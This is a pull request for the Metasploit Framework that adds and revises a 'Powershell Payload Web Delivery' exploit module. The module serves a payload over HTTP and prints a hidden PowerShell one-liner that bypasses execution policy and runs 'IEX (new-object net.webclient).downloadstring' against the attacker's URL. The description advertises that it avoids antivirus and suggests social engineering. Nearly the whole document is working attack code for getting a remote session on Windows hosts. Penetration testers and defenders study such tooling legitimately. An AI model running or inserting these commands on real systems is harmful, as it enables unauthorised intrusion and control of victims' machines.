### PR TITLE
PSH Downloader

### DIFF
--- a/modules/exploits/windows/misc/powershell_http_deliver.rb
+++ b/modules/exploits/windows/misc/powershell_http_deliver.rb
@@ -52,9 +52,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		url = (datastore['SSL'] ? "https://" : "http://")
 		url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
 		url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
-		print_good("Run the following command in powershell:")
-		print_line
-		print_line("IEX (new-object net.webclient).downloadstring(\"#{url}\");")
+		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+		print_good(download_and_run)
+		print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
 		print_line
 		super
 	end

--- a/modules/exploits/windows/misc/powershell_http_deliver.rb
+++ b/modules/exploits/windows/misc/powershell_http_deliver.rb
@@ -1,0 +1,61 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		 => 'Powershell HTTP Downloader',
+			'Description'	 => %q{
+				Quickly fires up a web server that provides the payload in powershell
+				for one line execution
+			},
+			'License'	 => MSF_LICENSE,
+			'Author'	 =>
+				[
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
+					'Chris Campbell <>' #Inspiration n.b. no relation!
+				],
+			'References'	 =>
+				[
+					[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ]
+				],
+			'Platform'	 => 'win',
+			'Targets'	 =>
+				[
+					[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+					[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 19 2013'))
+	end
+
+	def on_request_uri(cli, request)
+		print_status("Delivering Payload")
+		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+		return
+
+	end
+
+	def exploit
+		datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
+		url = (datastore['SSL'] ? "https://" : "http://")
+		url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
+		url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
+		print_good("Run the following command in powershell:")
+		print_line
+		print_line("IEX (new-object net.webclient).downloadstring(\"#{url}\");")
+		print_line
+		super
+	end
+end

--- a/modules/exploits/windows/misc/powershell_http_deliver.rb
+++ b/modules/exploits/windows/misc/powershell_http_deliver.rb
@@ -16,14 +16,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'		 => 'Powershell HTTP Downloader',
 			'Description'	 => %q{
-				Quickly fires up a web server that provides the payload in powershell
-				for one line execution
+				Quickly fires up a web server that serves the payload in powershell.
+				Two commands are given, the first will download and execute the payload
+				from within a powershell terminal. The second will start powershell and
+				then download and execute the payload. The main goal of this module is
+				so that a session can be quickly established on a target machine when
+				you have to manually type in the command yourself.
 			},
 			'License'	 => MSF_LICENSE,
 			'Author'	 =>
 				[
 					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
-					'Chris Campbell <>' #Inspiration n.b. no relation!
+					'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
 				],
 			'References'	 =>
 				[

--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'Powershell HTTP Downloader',
+			'Name'		 => 'Powershell HTTP Download Delivery',
 			'Description'	 => %q{
 				Quickly fires up a web server that serves the payload in powershell.
-				Two commands are given, the first will download and execute the payload
-				from within a powershell terminal. The second will start powershell and
-				then download and execute the payload. The main goal of this module is
-				so that a session can be quickly established on a target machine when
-				you have to manually type in the command yourself.
+				The command will start powershell and then download and execute the payload.
+				You can extract the IEX command to execute directly from powershell.
+				The main goal of this module is	that a session can be quickly established
+				on a target machine when you have to manually type in the command yourself,
+				e.g. RDP Session, Local Access or maybe Remote Command Exec.
+				This does not write to disk so is unlikely to trigger AV solutions and will
+				allow you to attempt local privilege escalations supplied by meterpreter etc.
+				You could also try your luck with social engineering.
+				Ensure your payload architecture matches the target computer or use SYSWOW64
+				powershell.exe to execute x86 payloads on x64 machines.
 			},
 			'License'	 => MSF_LICENSE,
 			'Author'	 =>
@@ -47,19 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Delivering Payload")
 		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
 		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
-		return
-
 	end
 
-	def exploit
-		datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
-		url = (datastore['SSL'] ? "https://" : "http://")
-		url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
-		url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
+	def primer
+		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-		print_good(download_and_run)
-		print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
-		print_line
-		super
+		print_status("Run the following command on the target machine:")
+		print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
 	end
 end
+

--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'Powershell HTTP Download Delivery',
+			'Name'		 => 'Powershell Web Delivery',
 			'Description'	 => %q{
 				Quickly fires up a web server that serves the payload in powershell.
 				The command will start powershell and then download and execute the payload.

--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,12 +14,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'Powershell Web Delivery',
+			'Name'		 => 'Powershell Payload Web Delivery',
 			'Description'	 => %q{
 				Quickly fires up a web server that serves the payload in powershell.
 				The command will start powershell and then download and execute the payload.
 				You can extract the IEX command to execute directly from powershell.
-				The main goal of this module is	that a session can be quickly established
+				The main purpose of this module is to quickly establish a session
 				on a target machine when you have to manually type in the command yourself,
 				e.g. RDP Session, Local Access or maybe Remote Command Exec.
 				This does not write to disk so is unlikely to trigger AV solutions and will
@@ -36,7 +36,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'	 =>
 				[
-					[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ]
+					[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+					[ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+					[ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
 				],
 			'Platform'	 => 'win',
 			'Targets'	 =>
@@ -58,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 		print_status("Run the following command on the target machine:")
-		print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
+		print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
 	end
 end
 


### PR DESCRIPTION
Whacked together this module after being inspired by http://www.pentestgeek.com/2013/07/19/invoke-shellcode/

Generates a psh payload and serves it up via HTTP. Gives you the command line to run on local machine. 

Handy if you don't have web access as per the blog, or working in a test environment etc. Also its somewhere I can goto when I forget the one liner...
